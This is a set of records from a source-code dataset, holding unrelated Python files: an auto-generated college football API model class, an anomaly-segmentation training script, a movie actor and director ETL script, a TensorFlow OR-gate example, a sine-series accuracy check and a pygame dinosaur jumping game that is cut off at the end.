{"seq_id":"40646154680","text":"# coding: utf-8\n\n\"\"\"\n    College Football Data API\n\n    This is an API for accessing all sorts of college football data. Please note that API keys should be supplied with \\\"Bearer \\\" prepended (e.g. 
\\\"Bearer your_key\\\"). API keys can be acquired from the CollegeFootballData.com website. # noqa: E501\n\n OpenAPI spec version: 4.5.1\n Contact: admin@collegefootballdata.com\n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\nfrom cfbd.configuration import Configuration\n\n\nclass DraftPick(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'college_athlete_id': 'int',\n 'nfl_athlete_id': 'int',\n 'college_id': 'int',\n 'college_team': 'str',\n 'college_conference': 'str',\n 'nfl_team': 'str',\n 'year': 'int',\n 'overall': 'int',\n 'round': 'int',\n 'pick': 'int',\n 'name': 'str',\n 'position': 'str',\n 'height': 'int',\n 'weight': 'int',\n 'pre_draft_ranking': 'int',\n 'pre_draft_position_ranking': 'int',\n 'pre_draft_grade': 'int',\n 'hometown_info': 'DraftPickHometownInfo'\n }\n\n attribute_map = {\n 'college_athlete_id': 'collegeAthleteId',\n 'nfl_athlete_id': 'nflAthleteId',\n 'college_id': 'collegeId',\n 'college_team': 'collegeTeam',\n 'college_conference': 'collegeConference',\n 'nfl_team': 'nflTeam',\n 'year': 'year',\n 'overall': 'overall',\n 'round': 'round',\n 'pick': 'pick',\n 'name': 'name',\n 'position': 'position',\n 'height': 'height',\n 'weight': 'weight',\n 'pre_draft_ranking': 'preDraftRanking',\n 'pre_draft_position_ranking': 'preDraftPositionRanking',\n 'pre_draft_grade': 'preDraftGrade',\n 'hometown_info': 'hometownInfo'\n }\n\n def __init__(self, college_athlete_id=None, nfl_athlete_id=None, college_id=None, college_team=None, college_conference=None, nfl_team=None, year=None, overall=None, round=None, pick=None, name=None, position=None, height=None, weight=None, pre_draft_ranking=None, pre_draft_position_ranking=None, pre_draft_grade=None, hometown_info=None, _configuration=None): # noqa: E501\n \"\"\"DraftPick - a model defined in Swagger\"\"\" # noqa: E501\n if _configuration is None:\n _configuration = Configuration()\n self._configuration = _configuration\n\n self._college_athlete_id = None\n self._nfl_athlete_id = None\n self._college_id = None\n self._college_team = None\n self._college_conference = None\n self._nfl_team = None\n self._year = None\n self._overall = None\n self._round = None\n self._pick = None\n self._name = None\n self._position = None\n self._height = None\n self._weight = None\n self._pre_draft_ranking = None\n self._pre_draft_position_ranking = None\n self._pre_draft_grade = None\n self._hometown_info = None\n self.discriminator = None\n\n if college_athlete_id is not None:\n self.college_athlete_id = college_athlete_id\n if nfl_athlete_id is not None:\n self.nfl_athlete_id = nfl_athlete_id\n if college_id is not None:\n self.college_id = college_id\n if college_team is not None:\n self.college_team = college_team\n if college_conference is not None:\n self.college_conference = college_conference\n if nfl_team is not None:\n self.nfl_team = nfl_team\n if year is not None:\n self.year = year\n if overall is not None:\n self.overall = overall\n if round is not None:\n self.round = round\n if pick is not None:\n self.pick = pick\n if name is not None:\n self.name = name\n if position is not None:\n self.position = position\n if height is not 
None:\n self.height = height\n if weight is not None:\n self.weight = weight\n if pre_draft_ranking is not None:\n self.pre_draft_ranking = pre_draft_ranking\n if pre_draft_position_ranking is not None:\n self.pre_draft_position_ranking = pre_draft_position_ranking\n if pre_draft_grade is not None:\n self.pre_draft_grade = pre_draft_grade\n if hometown_info is not None:\n self.hometown_info = hometown_info\n\n @property\n def college_athlete_id(self):\n \"\"\"Gets the college_athlete_id of this DraftPick. # noqa: E501\n\n\n :return: The college_athlete_id of this DraftPick. # noqa: E501\n :rtype: int\n \"\"\"\n return self._college_athlete_id\n\n @college_athlete_id.setter\n def college_athlete_id(self, college_athlete_id):\n \"\"\"Sets the college_athlete_id of this DraftPick.\n\n\n :param college_athlete_id: The college_athlete_id of this DraftPick. # noqa: E501\n :type: int\n \"\"\"\n\n self._college_athlete_id = college_athlete_id\n\n @property\n def nfl_athlete_id(self):\n \"\"\"Gets the nfl_athlete_id of this DraftPick. # noqa: E501\n\n\n :return: The nfl_athlete_id of this DraftPick. # noqa: E501\n :rtype: int\n \"\"\"\n return self._nfl_athlete_id\n\n @nfl_athlete_id.setter\n def nfl_athlete_id(self, nfl_athlete_id):\n \"\"\"Sets the nfl_athlete_id of this DraftPick.\n\n\n :param nfl_athlete_id: The nfl_athlete_id of this DraftPick. # noqa: E501\n :type: int\n \"\"\"\n\n self._nfl_athlete_id = nfl_athlete_id\n\n @property\n def college_id(self):\n \"\"\"Gets the college_id of this DraftPick. # noqa: E501\n\n\n :return: The college_id of this DraftPick. # noqa: E501\n :rtype: int\n \"\"\"\n return self._college_id\n\n @college_id.setter\n def college_id(self, college_id):\n \"\"\"Sets the college_id of this DraftPick.\n\n\n :param college_id: The college_id of this DraftPick. # noqa: E501\n :type: int\n \"\"\"\n\n self._college_id = college_id\n\n @property\n def college_team(self):\n \"\"\"Gets the college_team of this DraftPick. # noqa: E501\n\n\n :return: The college_team of this DraftPick. # noqa: E501\n :rtype: str\n \"\"\"\n return self._college_team\n\n @college_team.setter\n def college_team(self, college_team):\n \"\"\"Sets the college_team of this DraftPick.\n\n\n :param college_team: The college_team of this DraftPick. # noqa: E501\n :type: str\n \"\"\"\n\n self._college_team = college_team\n\n @property\n def college_conference(self):\n \"\"\"Gets the college_conference of this DraftPick. # noqa: E501\n\n\n :return: The college_conference of this DraftPick. # noqa: E501\n :rtype: str\n \"\"\"\n return self._college_conference\n\n @college_conference.setter\n def college_conference(self, college_conference):\n \"\"\"Sets the college_conference of this DraftPick.\n\n\n :param college_conference: The college_conference of this DraftPick. # noqa: E501\n :type: str\n \"\"\"\n\n self._college_conference = college_conference\n\n @property\n def nfl_team(self):\n \"\"\"Gets the nfl_team of this DraftPick. # noqa: E501\n\n\n :return: The nfl_team of this DraftPick. # noqa: E501\n :rtype: str\n \"\"\"\n return self._nfl_team\n\n @nfl_team.setter\n def nfl_team(self, nfl_team):\n \"\"\"Sets the nfl_team of this DraftPick.\n\n\n :param nfl_team: The nfl_team of this DraftPick. # noqa: E501\n :type: str\n \"\"\"\n\n self._nfl_team = nfl_team\n\n @property\n def year(self):\n \"\"\"Gets the year of this DraftPick. # noqa: E501\n\n\n :return: The year of this DraftPick. 
# noqa: E501\n :rtype: int\n \"\"\"\n return self._year\n\n @year.setter\n def year(self, year):\n \"\"\"Sets the year of this DraftPick.\n\n\n :param year: The year of this DraftPick. # noqa: E501\n :type: int\n \"\"\"\n\n self._year = year\n\n @property\n def overall(self):\n \"\"\"Gets the overall of this DraftPick. # noqa: E501\n\n\n :return: The overall of this DraftPick. # noqa: E501\n :rtype: int\n \"\"\"\n return self._overall\n\n @overall.setter\n def overall(self, overall):\n \"\"\"Sets the overall of this DraftPick.\n\n\n :param overall: The overall of this DraftPick. # noqa: E501\n :type: int\n \"\"\"\n\n self._overall = overall\n\n @property\n def round(self):\n \"\"\"Gets the round of this DraftPick. # noqa: E501\n\n\n :return: The round of this DraftPick. # noqa: E501\n :rtype: int\n \"\"\"\n return self._round\n\n @round.setter\n def round(self, round):\n \"\"\"Sets the round of this DraftPick.\n\n\n :param round: The round of this DraftPick. # noqa: E501\n :type: int\n \"\"\"\n\n self._round = round\n\n @property\n def pick(self):\n \"\"\"Gets the pick of this DraftPick. # noqa: E501\n\n\n :return: The pick of this DraftPick. # noqa: E501\n :rtype: int\n \"\"\"\n return self._pick\n\n @pick.setter\n def pick(self, pick):\n \"\"\"Sets the pick of this DraftPick.\n\n\n :param pick: The pick of this DraftPick. # noqa: E501\n :type: int\n \"\"\"\n\n self._pick = pick\n\n @property\n def name(self):\n \"\"\"Gets the name of this DraftPick. # noqa: E501\n\n\n :return: The name of this DraftPick. # noqa: E501\n :rtype: str\n \"\"\"\n return self._name\n\n @name.setter\n def name(self, name):\n \"\"\"Sets the name of this DraftPick.\n\n\n :param name: The name of this DraftPick. # noqa: E501\n :type: str\n \"\"\"\n\n self._name = name\n\n @property\n def position(self):\n \"\"\"Gets the position of this DraftPick. # noqa: E501\n\n\n :return: The position of this DraftPick. # noqa: E501\n :rtype: str\n \"\"\"\n return self._position\n\n @position.setter\n def position(self, position):\n \"\"\"Sets the position of this DraftPick.\n\n\n :param position: The position of this DraftPick. # noqa: E501\n :type: str\n \"\"\"\n\n self._position = position\n\n @property\n def height(self):\n \"\"\"Gets the height of this DraftPick. # noqa: E501\n\n\n :return: The height of this DraftPick. # noqa: E501\n :rtype: int\n \"\"\"\n return self._height\n\n @height.setter\n def height(self, height):\n \"\"\"Sets the height of this DraftPick.\n\n\n :param height: The height of this DraftPick. # noqa: E501\n :type: int\n \"\"\"\n\n self._height = height\n\n @property\n def weight(self):\n \"\"\"Gets the weight of this DraftPick. # noqa: E501\n\n\n :return: The weight of this DraftPick. # noqa: E501\n :rtype: int\n \"\"\"\n return self._weight\n\n @weight.setter\n def weight(self, weight):\n \"\"\"Sets the weight of this DraftPick.\n\n\n :param weight: The weight of this DraftPick. # noqa: E501\n :type: int\n \"\"\"\n\n self._weight = weight\n\n @property\n def pre_draft_ranking(self):\n \"\"\"Gets the pre_draft_ranking of this DraftPick. # noqa: E501\n\n\n :return: The pre_draft_ranking of this DraftPick. # noqa: E501\n :rtype: int\n \"\"\"\n return self._pre_draft_ranking\n\n @pre_draft_ranking.setter\n def pre_draft_ranking(self, pre_draft_ranking):\n \"\"\"Sets the pre_draft_ranking of this DraftPick.\n\n\n :param pre_draft_ranking: The pre_draft_ranking of this DraftPick. 
# noqa: E501\n :type: int\n \"\"\"\n\n self._pre_draft_ranking = pre_draft_ranking\n\n @property\n def pre_draft_position_ranking(self):\n \"\"\"Gets the pre_draft_position_ranking of this DraftPick. # noqa: E501\n\n\n :return: The pre_draft_position_ranking of this DraftPick. # noqa: E501\n :rtype: int\n \"\"\"\n return self._pre_draft_position_ranking\n\n @pre_draft_position_ranking.setter\n def pre_draft_position_ranking(self, pre_draft_position_ranking):\n \"\"\"Sets the pre_draft_position_ranking of this DraftPick.\n\n\n :param pre_draft_position_ranking: The pre_draft_position_ranking of this DraftPick. # noqa: E501\n :type: int\n \"\"\"\n\n self._pre_draft_position_ranking = pre_draft_position_ranking\n\n @property\n def pre_draft_grade(self):\n \"\"\"Gets the pre_draft_grade of this DraftPick. # noqa: E501\n\n\n :return: The pre_draft_grade of this DraftPick. # noqa: E501\n :rtype: int\n \"\"\"\n return self._pre_draft_grade\n\n @pre_draft_grade.setter\n def pre_draft_grade(self, pre_draft_grade):\n \"\"\"Sets the pre_draft_grade of this DraftPick.\n\n\n :param pre_draft_grade: The pre_draft_grade of this DraftPick. # noqa: E501\n :type: int\n \"\"\"\n\n self._pre_draft_grade = pre_draft_grade\n\n @property\n def hometown_info(self):\n \"\"\"Gets the hometown_info of this DraftPick. # noqa: E501\n\n\n :return: The hometown_info of this DraftPick. # noqa: E501\n :rtype: DraftPickHometownInfo\n \"\"\"\n return self._hometown_info\n\n @hometown_info.setter\n def hometown_info(self, hometown_info):\n \"\"\"Sets the hometown_info of this DraftPick.\n\n\n :param hometown_info: The hometown_info of this DraftPick. # noqa: E501\n :type: DraftPickHometownInfo\n \"\"\"\n\n self._hometown_info = hometown_info\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n if issubclass(DraftPick, dict):\n for key, value in self.items():\n result[key] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, DraftPick):\n return False\n\n return self.to_dict() == other.to_dict()\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n if not isinstance(other, DraftPick):\n return True\n\n return self.to_dict() != other.to_dict()\n","repo_name":"CFBD/cfbd-python","sub_path":"cfbd/models/draft_pick.py","file_name":"draft_pick.py","file_ext":"py","file_size_in_byte":15563,"program_lang":"python","lang":"en","doc_type":"code","stars":106,"dataset":"github-code","pt":"72"} +{"seq_id":"13109216573","text":"import argparse\nimport torch.distributed as dist\nimport torch.optim\nfrom config.config import config\nfrom dataset.data_loader import Fishyscapes, Cityscapes\nfrom dataset.data_loader import get_mix_loader\nfrom engine.engine import Engine\nfrom engine.evaluator import 
SlidingEval\nfrom engine.lr_policy import WarmUpPolyLR\nfrom engine.trainer import Trainer\nfrom losses import *\nfrom model.network import Network\nfrom utils.img_utils import *\nfrom utils.wandb_upload import *\nfrom valid import *\n\nfrom utils.logger import *\n\nwarnings.filterwarnings('ignore', '.*imshow.*', )\n\n\ndef declare_settings(config_file, logger, engine):\n logger.critical(\"distributed data parallel training: {}\".format(str(\"on\" if engine.distributed is True\n else \"off\")))\n \n logger.critical(\"gpus: {}, with batch_size[local]: {}\".format(engine.world_size, config.batch_size))\n\n logger.critical(\"network architecture: {}, with ResNet {} backbone\".format(\"deeplabv3+\",\n config_file['pretrained_weight_path']\n .split('/')[-1].split('_')[0]))\n logger.critical(\"learning rate: other {}, and head is same [world]\".format(config_file['lr']))\n\n logger.info(\"image: {}x{} based on 1024x2048\".format(config_file['image_height'],\n config_file['image_width']))\n\n logger.info(\"current batch: {} [world]\".format(int(config_file['batch_size']) * engine.world_size))\n\n\ndef main(gpu, ngpus_per_node, config, args):\n args.local_rank = gpu\n logger = logging.getLogger(\"pebal\")\n logger.propagate = False\n engine = Engine(custom_arg=args, logger=logger,\n continue_state_object=config.pretrained_weight_path)\n\n if engine.local_rank <= 0:\n declare_settings(config_file=config, logger=logger, engine=engine)\n visual_tool = Tensorboard(config=config)\n else:\n visual_tool = None\n\n seed = config.seed\n\n if engine.distributed:\n seed = seed + engine.local_rank\n\n torch.manual_seed(seed)\n if torch.cuda.is_available():\n torch.cuda.manual_seed(seed)\n\n model = Network(config.num_classes, wide=True)\n gambler_loss = Gambler(reward=[4.5], pretrain=-1, device=engine.local_rank if engine.local_rank >= 0 else 0)\n\n optimizer = torch.optim.Adam(model.parameters(), lr=config.lr)\n testing_transform = Compose([ToTensor(), Normalize(config.image_mean, config.image_std)])\n fishyscapes_ls = Fishyscapes(split='LostAndFound', root=config.fishy_root_path, transform=testing_transform)\n fishyscapes_static = Fishyscapes(split='Static', root=config.fishy_root_path, transform=testing_transform)\n cityscapes = Cityscapes(root=config.city_root_path, split=\"val\", transform=testing_transform)\n\n # config lr policy\n base_lr = config.lr\n total_iteration = config.nepochs * config.niters_per_epoch\n lr_policy = WarmUpPolyLR(base_lr, config.lr_power, total_iteration, config.niters_per_epoch * config.warm_up_epoch)\n trainer = Trainer(engine=engine, loss1=gambler_loss, loss2=energy_loss, lr_scheduler=lr_policy,\n ckpt_dir=config.saved_dir, tensorboard=visual_tool)\n\n evaluator = SlidingEval(config, device=0 if engine.local_rank < 0 else engine.local_rank)\n\n if engine.distributed:\n torch.cuda.set_device(engine.local_rank)\n model.cuda(engine.local_rank)\n model = torch.nn.SyncBatchNorm.convert_sync_batchnorm(model)\n model = torch.nn.parallel.DistributedDataParallel(model, device_ids=[engine.local_rank],\n find_unused_parameters=True)\n else:\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n model = torch.nn.DataParallel(model, device_ids=engine.devices)\n model.to(device)\n\n # starting with the pre-trained weight from https://github.com/NVIDIA/semantic-segmentation/tree/sdcnet\n if engine.continue_state_object:\n engine.register_state(dataloader=None, model=model, optimizer=optimizer)\n engine.restore_checkpoint(extra_channel=True)\n # 
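alternatively, warm-start from a PEBAL checkpoint (kept commented out):\n        # 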
engine.load_pebal_ckpt(config.pebal_weight_path, model=model)\n\n    logger.info('training begin...')\n\n    for curr_epoch in range(engine.state.epoch, config.nepochs):\n\n        train_loader, train_sampler, void_ind = get_mix_loader(engine=engine, augment=True,\n                                                               cs_root=config.city_root_path,\n                                                               coco_root=config.coco_root_path)\n\n        engine.register_state(dataloader=train_loader, model=model, optimizer=optimizer)\n\n        trainer.train(model=model, epoch=curr_epoch, train_sampler=train_sampler, train_loader=train_loader,\n                      optimizer=optimizer)\n\n        if curr_epoch % config.eval_epoch == 0:\n            if engine.local_rank <= 0:\n                \"\"\"\n                # 1). we currently only support single gpu for the cityscapes sliding validation, and it might\n                # take a long time, feel free to uncomment it. (we have to use the sliding eval. to achieve the\n                # performance reported in the repo. https://github.com/NVIDIA/semantic-segmentation/tree/sdcnet\n                # from the pre-trained ckpt.)\n                # 2). we follow Meta-OoD to use single scale validation in OoD datasets, for fair comparison.\n                \"\"\"\n                # valid_epoch(model=model, engine=engine, test_set=cityscapes, my_wandb=visual_tool,\n                #             evaluator=evaluator, logger=logger)\n\n                valid_anomaly(model=model, epoch=curr_epoch, test_set=fishyscapes_ls, data_name='Fishyscapes_ls',\n                              my_wandb=visual_tool, logger=logger)\n\n                valid_anomaly(model=model, epoch=curr_epoch, test_set=fishyscapes_static,\n                              data_name='Fishyscapes_static', my_wandb=visual_tool, logger=logger)\n\n        if engine.distributed:\n            dist.barrier()\n\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser(description='Anomaly Segmentation')\n    parser.add_argument('--gpus', default=1,\n                        type=int,\n                        help=\"gpus in use\")\n    parser.add_argument('-l', '--local_rank', default=-1,\n                        type=int,\n                        help=\"distributed or not\")\n    parser.add_argument('-n', '--nodes', default=1,\n                        type=int,\n                        help=\"distributed or not\")\n    args = parser.parse_args()\n\n    torch.backends.cudnn.benchmark = True\n\n    args.world_size = args.nodes * args.gpus\n\n    # we enforce the flag of ddp if gpus >= 2;\n    args.ddp = True if args.world_size > 1 else False\n    if args.gpus <= 1:\n        main(-1, 1, config=config, args=args)\n    else:\n        torch.multiprocessing.spawn(main, nprocs=args.gpus, args=(args.gpus, config, args))\n","repo_name":"tianyu0207/PEBAL","sub_path":"code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7077,"program_lang":"python","lang":"en","doc_type":"code","stars":132,"dataset":"github-code","pt":"72"}
{"seq_id":"22804710848","text":"import csv\nimport Levenshtein\n\nurl = \"../../../data/NewRawData/id_director_actor.csv\"\nurlA = \"../../../data/NewRawData/actor.csv\"\nurlD = \"../../../data/NewRawData/director.csv\"\n\n\n# Functions for creating and appending to a CSV file\n# def create_csv():\n#     path = url\n#     with open(path, 'w') as f:\n#         csv_write = csv.writer(f)\n#\n#\n# def write_csv(c):\n#     path = url\n#     with open(path, 'a+', newline='', encoding='utf-8') as f:\n#         csv_write = csv.writer(f)\n#         data_row = c\n#         csv_write.writerow(data_row)\n\n\n# Functions for creating and appending to the director CSV file\ndef create_csvD():\n    path = urlD\n    with open(path, 'w') as f:\n        csv_write = csv.writer(f)\n\n\ndef write_csvD(c):\n    path = urlD\n    with open(path, 'a+', newline='', encoding='utf-8') as f:\n        csv_write = csv.writer(f)\n        data_row = c\n        csv_write.writerow(data_row)\n\n\n# Functions for creating and appending to the actor CSV file\ndef create_csvA():\n    path = urlA\n    with open(path, 'w') as f:\n        csv_write = csv.writer(f)\n\n\ndef write_csvA(c):\n    path = urlA\n    with open(path, 'a+', newline='', encoding='utf-8') as f:\n        csv_write = csv.writer(f)\n        data_row = c\n        csv_write.writerow(data_row)\n\n\n
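# Entry point: merge director/actor names across grouped movie ids, keeping only names\n# whose Levenshtein distance from already-kept names exceeds 5, then dump the lists.\n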
if __name__ == \"__main__\":\n\n    actor = {}\n    director = {}\n    name = {}\n    actorSet = set()\n    directorSet = set()\n    # create_csv()\n    # firstLine = \"ids\", \"directors\", \"actors\"\n\n    resFile = open(\"../../../data/result/last.csv\", \"r\", encoding=\"utf-8\")\n    resReader = csv.reader(resFile)\n    for line in resReader:\n        actor[line[0]] = line[3]\n        director[line[0]] = line[2]\n        name[line[0]] = line[1]\n\n    csvFile = open(\"../../../data/raw/updateMergedMovie.csv\", \"r\", encoding=\"utf-8\")\n    reader = csv.reader(csvFile)\n    i = 0\n    for line in reader:\n        i = i + 1\n        if i % 1000 == 0:\n            print(i)\n        idList = line[0].strip(\"[\").strip(\"]\").split(\",\")\n        actorsss = set()\n        directorsss = set()\n        namesss = ''\n        for item in idList:\n            idItem = item.strip().strip(\"'\").strip()\n            if idItem not in actor.keys():\n                continue\n            actorList = actor[idItem].split(\",\")\n            directorList = director[idItem].split(\",\")\n            namesss = name[idItem]\n            for actorItem in actorList:\n                temp = actorItem.strip()\n                tempactor = set()\n                if len(actorsss) == 0:\n                    actorsss.add(temp)\n                    actorSet.add(temp)\n                for actorI in actorsss:\n                    if Levenshtein.distance(temp, actorI) > 5:\n                        tempactor.add(temp)\n                        actorSet.add(temp)\n                for tempactorItem in tempactor:\n                    actorsss.add(tempactorItem)\n            for directorItem in directorList:\n                temp = directorItem.strip()\n                tempdirector = set()\n                if len(directorsss) == 0:\n                    directorsss.add(temp)\n                    directorSet.add(temp)\n                for directorI in directorsss:\n                    if Levenshtein.distance(temp, directorI) > 5:\n                        tempdirector.add(temp)\n                        directorSet.add(temp)\n                for tempdirectorItem in tempdirector:\n                    directorsss.add(tempdirectorItem)\n        for item in idList:\n            content = item, directorsss, actorsss, namesss\n            # write_csv(content)\n\n    create_csvA()\n    create_csvD()\n    for ac in actorSet:\n        content = ac,\n        write_csvA(content)\n    for di in directorSet:\n        content = di,\n        write_csvD(content)\n","repo_name":"aroundabout/DataWarehouse","sub_path":"etl/DataProcess/format/getActorAndDirector.py","file_name":"getActorAndDirector.py","file_ext":"py","file_size_in_byte":3613,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"}
{"seq_id":"35684845108","text":"def solution(L, x):\n    # use >= so that a value equal to the current maximum is still inserted\n    if x >= L[len(L)-1]:\n        L.insert(len(L), x)\n    else:\n        for i in range(len(L)):\n            if x < L[i]:\n                L.insert(i, x)\n                break\n    return L\n\nL = [1,2,3,4,5,6]\nprint(solution(L,7))\n","repo_name":"mike6321/dataStructure_algorithm","sub_path":"Homework01/Problem02.py","file_name":"Problem02.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"34281359221","text":"import numpy as np\nimport tensorflow as tf\ntf.compat.v1.disable_v2_behavior()\ntf.compat.v1.disable_eager_execution()  # fall back from TensorFlow 2.x to 1.x-style graph execution\n\nw = tf.Variable(tf.zeros([2, 1]))  # the gate input is a 1x2 vector, so w is set to 2x1\nb = tf.Variable(tf.zeros([1]))  # x*w is a scalar, so the bias b is a single scalar\n\nx = tf.compat.v1.placeholder(tf.float32, shape=[None, 2])  # TF 1.x syntax: x is an empty placeholder that will receive the 1x2 inputs X later\nt = tf.compat.v1.placeholder(tf.float32, shape=[None, 1])  # t is either 0 or 1; it will receive the labels Y later\ny = tf.nn.sigmoid(tf.matmul(x, w) + b)  # y is the sigmoid of (x * w) + b\n\ncross_entropy = -tf.reduce_sum(t * tf.compat.v1.log(y) + (1 - t) * tf.compat.v1.log(1 - y))  # the cross-entropy error function written out directly\n\ntrain_step = tf.compat.v1.train.GradientDescentOptimizer(0.1).minimize(cross_entropy)  # gradient descent with learning rate 0.1 finds the w and b that minimize the cross-entropy\n\ncorrect_prediction = tf.equal(tf.compat.v1.to_float(tf.greater(y, 0.5)), t)  # tf.greater outputs 1 where y >= 0.5 and 0 otherwise; cast to float and compare with the label t\n                                                                     # why >= 0.5? because after training the outputs move closer to the true values\n
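# Training data: the OR-gate truth table (a single-layer model can learn OR, unlike XOR)\n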
X = np.array([[0, 0], [0, 1], [1, 0], [1, 1]])  # the four input cases of the OR gate\n\nY = np.array([[0], [1], [1], [1]])  # the true outputs for the four input cases, i.e. the labels\n\ninit = tf.compat.v1.global_variables_initializer()  # TF 1.x syntax: variables must be initialized inside a session before use\nsess = tf.compat.v1.Session()\nsess.run(init)\n\nfor epoch in range(200):  # iterate 200 times\n    sess.run(train_step, feed_dict={\n        x: X,\n        t: Y\n    })\n\nclassified = sess.run(correct_prediction, feed_dict={ # check what y has learned: do its outputs match t?\n    x: X,\n    t: Y\n})\n\nprint(classified)\n\nprob = sess.run(y, feed_dict={\n    x: X,\n    t: Y\n})\n\nprint(prob)\n\nprint('w: ', sess.run(w))\nprint('b: ', sess.run(b))\n\n","repo_name":"czpczpczp/py3.8-TF2.4","sub_path":"DL-tensorflow/3.4.3 tensorflow.py","file_name":"3.4.3 tensorflow.py","file_ext":"py","file_size_in_byte":2194,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"22953368411","text":"# -*- coding: utf-8 -*-\nfrom math import sin, factorial, fabs\n\nx=0.0\nj=0\nresult=0.0\nwhile 1:\n    n = int (raw_input(\"Введите максимальное значение: \"))# read n - the stopping bound of the loop\n    if n%2 and n>0: # sanity check: odd (nonzero remainder) and positive\n        break\nwhile 1:\n    E = float (raw_input (\"Введите значение точности: \"))\n    if E > 0:\n        break\nprint (\"=================================\")\nprint (\"n\\\\t X max\\\\t\")\nprint (\"---------------------------------\")\nfor t in range(1, n+1, 2):\n    x = 0.0\n    for i in range (1000):\n        result = 0.0\n        j = 0 # sign coefficient\n        for r in range(1, t+1, 2):\n            result+= ((-1)**j)*((x**r)/factorial(r))# ** is exponentiation\n            j = j+1\n        if fabs (sin(x) - result) > E: # absolute value; required accuracy\n            x-=0.1\n            print(\"%i --\\\\t %f\\\\t\" %(t,x))\n            break\n        else:\n            x+=0.1\nprint(\"=================================\")\n","repo_name":"hospitaler17/NumMeth","sub_path":"sin/sin.py","file_name":"sin.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"21338047524","text":"import random\nimport pygame\nimport pygame.freetype\n\n# Initialize the library\npygame.init()\n\nscreen = pygame.display.set_mode((900, 500))  # Set the window size\npygame.display.set_caption('Dino game')  # Window title\nclock = pygame.time.Clock()\n\nfont = pygame.freetype.Font(None, 40)  # Font\n\n# Load the sprites\ncactus_image = pygame.image.load('images/cactus.png')\ncactus_image = pygame.transform.scale(cactus_image, (50, 80))\ndino_image = pygame.image.load('images/dino.png')\ndino_image = pygame.transform.scale(dino_image, (100, 100))\nground_image = pygame.image.load('images/ground.png')\nground_image = pygame.transform.scale(ground_image, (800, 142))\n\n# Group the sprites\nground_group = pygame.sprite.Group()\ncactus_group = pygame.sprite.Group()\n\n\nground_event = pygame.USEREVENT\ncactus_event = pygame.USEREVENT + 1\npygame.time.set_timer(ground_event, 2000)\npygame.time.set_timer(cactus_event, 6000)\n\n\nclass Ground(pygame.sprite.Sprite):\n    '''The ground surface'''\n    def __init__(self, image, position):\n        super().__init__()\n        self.image = image\n        self.rect = self.image.get_rect()\n        self.rect.center = position\n\n    def update(self):\n        self.rect.x -= 3\n        if self.rect.right < 0:\n            self.kill()\n\n\nclass Cactus(pygame.sprite.Sprite):\n    def __init__(self, image, position):\n        super().__init__()\n        self.image = image\n        self.rect = self.image.get_rect()\n        self.rect.center = position\n\n    def update(self):\n        self.rect.x -= 3\n        
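# once the cactus scrolls off the left edge, despawn it and award a point\n        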
if self.rect.right < 0:\n            self.kill()\n            dino.score += 1\n        # collision between the cactus and the dino ends the game\n        if self.rect.colliderect(dino.rect):\n            dino.game_status = 'Menu'\n\n\nclass Dino:\n    def __init__(self, image, position):\n        self.image = image\n        self.rect = self.image.get_rect()\n        self.rect.center = position\n        self.y = 0\n        self.step = 6\n        self.max_jump = 60\n        self.in_jump = False\n        self.score = 0\n        self.game_status = 'Game'\n\n    def jump(self):\n        if self.in_jump:\n            if self.y < self.max_jump:\n                self.y += 1\n                self.rect.y -= self.step\n            elif self.y < self.max_jump * 2:\n                self.y += 1\n                self.rect.y += self.step\n            else:\n                self.in_jump = False\n                self.y = 0\n\n    def draw(self):\n        screen.blit(self.image, self.rect)\n\n# Create the game objects at their starting sizes and positions\ndino = Dino(dino_image, (100, 400))\ng = Ground(ground_image, (300, 450))\nground_group.add(g)\ng = Ground(ground_image, (900, 450))\nground_group.add(g)\nrunning = True\n\nwhile running:\n    \"\"\"Input handling\"\"\"\n    for event in pygame.event.get():\n        if event.type == pygame.QUIT:\n            running = False\n        if event.type == pygame.KEYDOWN:\n            dino.in_jump = True\n        if event.type == ground_event:\n            g = Ground(ground_image, (900, 450))\n            ground_group.add(g)\n        if event.type == cactus_event:\n            pygame.time.set_timer(cactus_event, random.randint(6000, 10000))\n            c = Cactus(cactus_image, (910, 400))\n            cactus_group.add(c)\n\n    screen.fill((255, 255, 255))\n    if dino.game_status == 'Game':\n        ground_group.update()\n        ground_group.draw(screen)\n        cactus_group.update()\n        cactus_group.draw(screen)\n        dino.jump()\n        dino.draw()\n        font.render_to(screen, (850, 50), str(dino.score), (0, 0, 0))\n    else:\n        font.render_to(screen, (450, 200), 'Game over', (0, 0, 0))\n    pygame.display.flip()\n    